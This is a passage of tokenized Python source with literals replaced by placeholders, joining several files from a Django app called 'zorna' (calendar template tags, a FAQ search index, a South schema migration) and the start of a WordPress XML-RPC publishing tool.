<NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> cal_date = bits [ - <NUM_LIT:4> ] <EOL> limit = bits [ - <NUM_LIT:3> ] <EOL> varname = bits [ - <NUM_LIT:1> ] <EOL> cal_id = int ( bits [ <NUM_LIT:1> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> return resource_calendar_events_node ( cal_id , cal_date , limit , varname ) <EOL> class resource_calendar_events_node ( template . Node ) : <EOL> def __init__ ( self , cal_id , cal_date , limit , var_name ) : <EOL> sd = cal_date [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if sd : <EOL> sd = map ( int , sd . split ( '<STR_LIT:->' ) ) <EOL> start_date = datetime . datetime ( sd [ <NUM_LIT:0> ] , sd [ <NUM_LIT:1> ] , sd [ <NUM_LIT:2> ] ) <EOL> else : <EOL> start_date = datetime . datetime . today ( ) <EOL> limits = limit [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( '<STR_LIT:U+002C>' ) <EOL> self . start_date = start_date - datetime . timedelta ( days = int ( limits [ <NUM_LIT:0> ] ) ) <EOL> self . end_date = start_date + datetime . timedelta ( days = int ( limits [ <NUM_LIT:1> ] ) ) <EOL> self . var_name = var_name <EOL> self . cal_id = cal_id <EOL> def render ( self , context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> events_list = [ ] <EOL> try : <EOL> resource = ZornaResourceCalendar . objects . get ( pk = self . cal_id ) <EOL> calendar = get_resource_calendar ( resource ) <EOL> ao = get_allowed_objects ( request . user , type ( calendar ) , '<STR_LIT>' ) <EOL> if calendar . pk in ao : <EOL> events_list = get_events_for_object ( <EOL> resource , self . start_date , self . end_date ) <EOL> except : <EOL> pass <EOL> context [ self . var_name ] = events_list <EOL> return '<STR_LIT>' <EOL> @ register . tag ( name = "<STR_LIT>" ) <EOL> def calendar_events_for_object ( parser , token ) : <EOL> '''<STR_LIT>''' <EOL> bits = token . split_contents ( ) <EOL> if <NUM_LIT:6> != len ( bits ) : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> if bits [ - <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> cal_date = bits [ - <NUM_LIT:4> ] <EOL> limit = bits [ - <NUM_LIT:3> ] <EOL> varname = bits [ - <NUM_LIT:1> ] <EOL> zornaobject = bits [ <NUM_LIT:1> ] <EOL> return calendar_events_for_object_node ( zornaobject , cal_date , limit , varname ) <EOL> class calendar_events_for_object_node ( template . Node ) : <EOL> def __init__ ( self , zornaobject , cal_date , limit , var_name ) : <EOL> sd = cal_date [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if sd : <EOL> sd = map ( int , sd . split ( '<STR_LIT:->' ) ) <EOL> start_date = datetime . datetime ( sd [ <NUM_LIT:0> ] , sd [ <NUM_LIT:1> ] , sd [ <NUM_LIT:2> ] ) <EOL> else : <EOL> start_date = datetime . datetime . today ( ) <EOL> limits = limit [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( '<STR_LIT:U+002C>' ) <EOL> self . start_date = start_date - datetime . timedelta ( days = int ( limits [ <NUM_LIT:0> ] ) ) <EOL> self . end_date = start_date + datetime . timedelta ( days = int ( limits [ <NUM_LIT:1> ] ) ) <EOL> self . var_name = var_name <EOL> self . zornaobject = Variable ( zornaobject ) <EOL> def render ( self , context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> events_list = [ ] <EOL> try : <EOL> zornaobject = self . zornaobject . resolve ( context ) <EOL> events_list = get_events_for_object ( <EOL> zornaobject , self . start_date , self . end_date ) <EOL> except Exception as e : <EOL> pass <EOL> context [ self . var_name ] = events_list <EOL> return '<STR_LIT>' <EOL> class resource_calendars ( template . Node ) : <EOL> def __init__ ( self , var_name , perm ) : <EOL> self . var_name = var_name <EOL> self . perm = perm <EOL> def render ( self , context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> calendars = get_user_calendars ( request . user , self . perm ) <EOL> context [ self . var_name ] = [ cal for cal in calendars if type ( cal . content_object ) == ZornaResourceCalendar ] <EOL> for cal in context [ self . var_name ] : <EOL> cal . name = cal . content_object . name <EOL> cal . description = cal . content_object . description <EOL> cal . url = reverse ( '<STR_LIT>' , args = [ cal . pk ] ) <EOL> return '<STR_LIT>' <EOL> @ register . tag ( name = "<STR_LIT>" ) <EOL> def get_resource_calendars ( parser , token ) : <EOL> '''<STR_LIT>''' <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) not in [ <NUM_LIT:3> , <NUM_LIT:4> ] : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> if bits [ - <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> varname = bits [ - <NUM_LIT:1> ] <EOL> if len ( bits ) == <NUM_LIT:4> : <EOL> perm = bits [ <NUM_LIT:1> ] . split ( '<STR_LIT:U+002C>' ) <EOL> else : <EOL> perm = [ '<STR_LIT>' ] <EOL> return resource_calendars ( varname , perm ) </s>
<s> import datetime <EOL> from haystack import indexes <EOL> from haystack import site <EOL> from zorna . faq . models import FaqQuestion <EOL> class FaqQuestionIndex ( indexes . SearchIndex ) : <EOL> text = indexes . CharField ( document = True , use_template = True ) <EOL> faq_name = indexes . CharField ( ) <EOL> faq = indexes . CharField ( ) <EOL> category = indexes . CharField ( ) <EOL> def get_model ( self ) : <EOL> return FaqQuestion <EOL> def get_updated_field ( self ) : <EOL> return '<STR_LIT>' <EOL> def index_queryset ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . get_model ( ) . objects . filter ( time_updated__lte = datetime . datetime . now ( ) ) <EOL> def prepare ( self , obj ) : <EOL> self . prepared_data = super ( FaqQuestionIndex , self ) . prepare ( obj ) <EOL> category = obj . category <EOL> faq = category . faq <EOL> self . prepared_data [ '<STR_LIT>' ] = faq . name <EOL> self . prepared_data [ '<STR_LIT>' ] = str ( faq . pk ) <EOL> self . prepared_data [ '<STR_LIT>' ] = category . name <EOL> return self . prepared_data <EOL> site . register ( FaqQuestion , FaqQuestionIndex ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> from django . db import connection <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . start_transaction ( ) <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( '<STR_LIT>' ) <EOL> qs = cursor . fetchall ( ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT:url>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT:message>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> from django . contrib . contenttypes . management import update_contenttypes <EOL> from django . db . models import get_app , get_models <EOL> update_contenttypes ( get_app ( '<STR_LIT>' ) , get_models ( ) ) <EOL> if not db . dry_run : <EOL> db . commit_transaction ( ) <EOL> db . start_transaction ( ) <EOL> ct = orm [ '<STR_LIT>' ] . objects . get ( app_label = "<STR_LIT>" , model = "<STR_LIT>" ) <EOL> for form in qs : <EOL> rep = orm . FormsFormActionMessage ( message = form [ <NUM_LIT> ] , form_id = form [ <NUM_LIT:0> ] ) <EOL> rep . save ( ) <EOL> orm . FormsFormAction . objects . create ( form_id = form [ <NUM_LIT:0> ] , object_id = rep . pk , content_type = ct ) <EOL> db . commit_transaction ( ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' ) , keep_default = False ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:list>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:list>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django import template <EOL> from zorna . utils import render_page <EOL> register = template . Library ( ) <EOL> def show_content ( context , page ) : <EOL> """<STR_LIT>""" <EOL> request = context . get ( '<STR_LIT>' , None ) <EOL> return { '<STR_LIT:content>' : render_page ( request , page ) } <EOL> show_content = register . inclusion_tag ( '<STR_LIT>' , <EOL> takes_context = True ) ( show_content ) </s>
<s> import os <EOL> import re <EOL> import platform <EOL> import shutil <EOL> from xmlrpc . client import Fault <EOL> from string import Template <EOL> from datetime import ( datetime , timedelta ) <EOL> import configparser <EOL> from wordpress_xmlrpc import ( Client , <EOL> WordPressPost , WordPressPage , WordPressTerm , WordPressMedia ) <EOL> from wordpress_xmlrpc . exceptions import InvalidCredentialsError <EOL> from wordpress_xmlrpc . methods . taxonomies import ( GetTerms ) <EOL> from pkg_resources import ( resource_filename , resource_string ) <EOL> from rookout import slog <EOL> from rookout . base import ( list_dir , read_file , write_file ) <EOL> from rookout . conf import PYConf <EOL> class Conf ( object ) : <EOL> TPL_FILE = 